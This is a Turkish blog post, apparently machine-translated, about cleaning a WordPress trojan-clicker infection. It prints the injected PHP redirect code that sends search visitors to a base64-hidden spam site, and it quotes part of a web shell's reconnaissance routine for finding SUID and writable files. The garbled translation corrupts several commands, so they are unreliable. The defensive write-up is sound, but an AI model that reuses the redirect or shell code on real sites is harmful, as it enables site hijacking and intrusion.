Virüs blogosfer… ama bende ne vardı?

Update
0

Geçen ay, ben uyarılar aldık blog virüsü Bazı ziyaretçiler. Ben oldukça iyi bir antivirüs yüklü çünkü Başlangıçta ben, uyarıları göz ardı (Kaspersky AV 2009) Ve uzun bir süre için bile blog, ben uzun zaman önce (bir virüs uyarısı almadım .. Ben ilk yenileme kayboldu şey şüpheli gördüm. Sonunda ...).
Yavaşça büyük farklılıklar göstermeye başladı ziyaretçi trafiğiSon zamanlarda giderek trafiği azalmış ve daha fazla insan olmaya başladığı sonra bana söylemeniz stealthsettings.com o virused. Antivirüs engellenen bir zaman Dün bir ekran yapmış birinden alınan senaryo itibaren stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. O yüzden aranan tüm kaynakları koymak, bana oldukça ikna ediciydi. Aklıma gelen ilk fikir yapmak oldu yükseltmek son WordPress (2.5.1), ancak eski komut dosyasındaki tüm dosyaları silmeden önce değil WordPress ve yapmak yedek veritabanı. Bu prosedür işe yaramadı ve eğer bana söylememişse, hatanın nerede olduğunu anlamam muhtemelen uzun zamanımı aldı. Eugen kahve üzerine bir tartışma, o bulundu bağlantı Google ve onu görmek iyi olurdu.
MyDigitalLife.info, şu başlıklı bir makale yayınladı: "WordPress Hack: Google'ı ve Arama Motorunu Kurtarın ve Düzeltin veya Your-Needs.info, AnyResults.Net, Golden-Info.net ve Diğer Yasadışı Sitelere Yönlendirilen Çerez Trafiği Yok"Ben gerekli iplik sonudur.
Bu hakkında sömürmek de WordPress çerezlere dayalıHangi Ben çok karmaşık olduğunu düşünüyorum ve kitap yaptı. Bir yapmak için yeterli Clever SQL Injection Veritabanı günlüğü, görünmez bir kullanıcı oluşturmak için Basit bir rutin kontrol Kullanıcı Paneli->Kullanıcılar, "yazılabilir" sunucu dizinleri ve dosyaları kontrol (O chmod 777), aramak ve yürütmek grup veya kök ayrıcalıklarına sahip dosyaları. Ben birçok bloglar Romanya dahil, enfekte olmasına rağmen, adını istismar ve onun hakkında yazılmış birkaç makale var olduğunu görmek kim olduğunu bilmiyorum. Tamam ... Ben virüs hakkında genellemeler açıklamaya deneyecektir.

Virüsü nedir?

İlk olarak, ziyaretçiler için görünmez ama görünür ve özellikle arama motorları, Google için indekslenebilen bağlantılar bloglar kaynaklardan sayfaları eklemek. Böylece saldırgan tarafından belirtilen aktarma Page Rank siteleri. İkincisi, bir başkası eklenir yönlendirme kodu Google, Live, Yahoo, gelen ziyaretçiler için URL ... ya da bir RSS okuyucu ve değil sitede kurabiye. bir antivirüs olarak yönlendirme algılar Trojan-Clicker.HTML.

Belirtileri:

Büyük ziyaretçi trafiği azalmışÖzellikle en ziyaretçiler hakkında gelen bloglar.

Tanımlama: (phpmyadmin, php ve hakkında fazla bilgisi olmayanlar için problemin karmaşıklaştığı yer burasıdır. linux)

LA. UYARI! Önce bir yedek veritabanı yapmak!

1. Kaynak dosyalarını kontrol edin index.php, header.php, footer.php, Blogun tema ve şifreleme kullanan bir kod olup olmadığını görmek base64 veya şu biçimde "if ($ ser ==" 1? && sizeof ($ _ COOKIE) == 0) "ifadesini içerir:

<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>

... Ya da bir şey. Bu kodu sil!

Resmin üzerine tıklayınız ...

kodu indeksi

Yukarıdaki ekran görüntüsünde yanlışlıkla seçtim ve " ". Bu kod kalmalıdır.

2. Kullanmak phpMyAdmin ve veritabanı tablo gitmek wp_usersOluşturulan herhangi bir kullanıcı adı varsa nerede kontrol 00:00:00 0000-00-00 (Alan Olası user_login yazmak "WordPress”. Bu kullanıcının kimliğini (ID alanı) not edin ve ardından silin.

Resmin üzerine tıklayınız ...

sahte kullanıcı

* Yeşil çizgi kaldırılır ve onun kimliğini muhafaza edilmelidir. Söz konusu uykuluOldu ID = 8 .

3. Tablo git wp_usermeta, Nerede bulunan ve silme ID hatları (burada alanı user_id Kimlik değeri) kaldırılır.

4. Tablo wp_optiongit active_plugins ve şüpheli etkindir ne eklentisi bakın. Bu sonlar gibi kullanılabilir _old.giff, _old.pngg, _old.jpeg, _new.php.giff, vb. _old ve _new ile sahte resim uzantılarının kombinasyonları.

SELECT * FROM wp_options WHERE option_name = 'active_plugins'

Bu eklentiyi silin, ardından herhangi bir eklentiyi devre dışı bırakıp etkinleştirdiğiniz blog -> Gösterge Tablosu -> Eklentiler'e gidin.

Bu active_plugins virüs dosyası görüntülenir görmek için resmin üzerine tıklayın.

fişe takmak

Active_plugins belirtilen FTP veya SSH, üzerindeki yolunu izleyin ve sunucudan dosyayı silin.

5. Ayrıca phpMyAdmin içinde, Tablo wp_optionIçeren satırı bulun ve silin "rss_f541b3abd05e7962fcab37737f40fad8'Ve'internal_links_cache ".
Internal_links_cache, bir blog görünür şifreli spam bağlantılarını sundu Kod Google Adsinse, Korsan.

6. Tavsiye edilir Şifreyi değiştirmek Blog ve giriş Tüm şüpheli userele kaldır. En son sürümüne yükseltin WordPress ve blogu artık yeni kullanıcıların kaydolmasına izin vermeyecek şekilde ayarlayın. Kaybı yoktur… ıssız da yorum yapabilirsiniz.

Yukarıda biraz açıklamaya çalıştım, böyle bir durumda ne yapılmalı, bu virüsün blogunu temizlemek için. Sorun göründüğünden çok daha ciddi ve neredeyse çözülmedi, çünkü güvenlik açıkları web sunucu barındırma, hangi blogu.

Erişimi olan bir güvenlik birinci önlemi olarak, SSH, Sonlar ile * _old * ve * _new. * Gibi dosyalar olup olmadığını görmek için sunucu üzerinde bazı kontroller yapın.giff,. JPEG,. pngg. jpgg. Bu dosyalar silinmelidir. Örneğin, bir dosyayı yeniden adlandırırsanız. top_right_old.giff in top_right_old.phpBiz dosyanın tam Yararlanma kodu sunucu olduğunu görüyoruz.

Sunucuyu denetlemek, temizlemek ve güvenliğini sağlamak için bazı yararlı talimatlar. (SSH aracılığıyla)

1.  cd / tmp gibi klasörler varsa ve kontrol tmpVFlma veya diğer kombinasyonlarla asemenatoare adı ve silin. Bana aşağıdaki ekran, iki tür klasörler bakınız:

tmpserver

rm-rf klasöradı

2. Kontrol edin ve ortadan kaldırın (değiştirin chmod-ul) mümkün olduğunca özniteliklere sahip klasörler chmod 777

geçerli dizindeki tüm yazılabilir dosyaları bul: Bulun. -Tipi f-perma-2-ls
simdiki tüm yazılabilir dizinleri bulabilirsiniz: Bulun. -Tip d-perma-2-ls
geçerli dizindeki tüm yazılabilir dizinleri ve dosyaları bulun: Bulun. -Perm-2-ls

3. Sunucu üzerinde şüpheli dosyaları arıyorsunuz.

find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"

4, UYARI! bit olan dosyaların SUID si SGID. Bu dosyalar kullanıcı (grup) veya kök değil, dosyayı çalıştırın kullanıcı ayrıcalıkları ile yürütmek. Güvenlik sorunları varsa, bu dosyaları, kök uzlaşmaya yol açabilir. Eğer biraz SGID dosyaları kullanmak istemiyorsanız, 'gerçekleştirmekchmod 0 " Onları veya kaldırma paketi bunları içeren.

Yerde kaynak içerir Exploit ...:

if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}

Bu şekilde ... temelde güvenlik ihlalleri bulur. Limanlar dizini "yazılabilir" ve grup yürütme ayrıcalıkları dosyaları / root açın.

Geri daha fazlası ...

Enfekte Bazı bloglar: www.blegoo.com, www.visurat.ro,

fulgerica.com, denisuca.com, www.ecostin.com,
www.razvanmatasel.ro,

blog.hrmarket.ro, www.nitza.ro,
motosikletler.motomag.ro,

emi.brainient.com, www.picsel.ro,

www.mihaidragan.ro/kinablog/,
krumel.seo-point.com, www.itex.ro/blog,
www.radiology.ro,

www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,

dragos.roua.ro, www.artistul.ro/blog/,

www.mirabilismedia.ro/blog, blog.einvest.ro
... Liste uzayıp gidiyor ... bir sürü.

Google arama motorunu kullanarak bir bloga virüs bulaşıp bulaşmadığını kontrol edebilirsiniz. kopyala yapıştır:

Site: www.blegoo.com buy

İyi geceler ve iyi çalışmalar;) Yakında Eugen'in öngörülebilir.unpredictable.com'da haberlerle geleceğini düşünüyorum.

brb :)

DİKKAT! temasını değiştirme WordPress veya yükseltme WordPress 2.5.1, bu virüsten kurtulmak için bir çözüm DEĞİLDİR.

Teknolojiye tutkulu, 2006 yılından beri StealthSettings.com'da yazıyorum. macOS, Windows ve Linux işletim sistemlerinde geniş deneyimim var, aynı zamanda programlama dilleri ve blog platformları (WordPress) ile online mağazalar için (WooCommerce, Magento, PrestaShop) bilgi sahibiyim.

Dersler tarafımdan yazılmıştır.
AntiVirüs ve Güvenlik Internet net Sörf önemli teknoloji Haberleri Eğitimler ve BT Haberleri Tweaks & Hacks WordPress
iframe virüsü Page Rank istismar Sunucu Güvenliği virüs spam SQL Injection trojan tıklayıcının virüs wordpress WordPress sömürmek
nasıl » önemli » Virüs blogosfer… ama bende ne vardı?

Windows Canlı Yazar / WordPress - Geçersiz Sunucu Yanıtı (XMLRPC)

Bir blog olup olmadığını Google ile nasıl öğrenebilirim? WordPress virüs mü

Leave a Comment

Stealth Settings

Windows

Windows 11

Windows 10

Windows 8 / 8.1

Windows 7

Windows manzara

Windows XP

görev Yöneticisi

Nasıl Yapılır

Microsoft 365 / Office

Microsoft 365 / Office

Excel

Word

PowerPoint

Outlook

Office 365 Productivity

Linux & Web Yazılımı

nginx

Apache HTTP Server

PHP

SQL/MySQL

CentOS

Ubuntu

web Hosting

WordPress & WooCommerce

Security & Antivirus

Awareness

Antivirus & Security

Malware

Spyware

© 2024 Stealth Settings. BT eğitimleri ve haberler.

Gizlilik politikası | Çerezler Hakkında | İletişim | Hakkımızda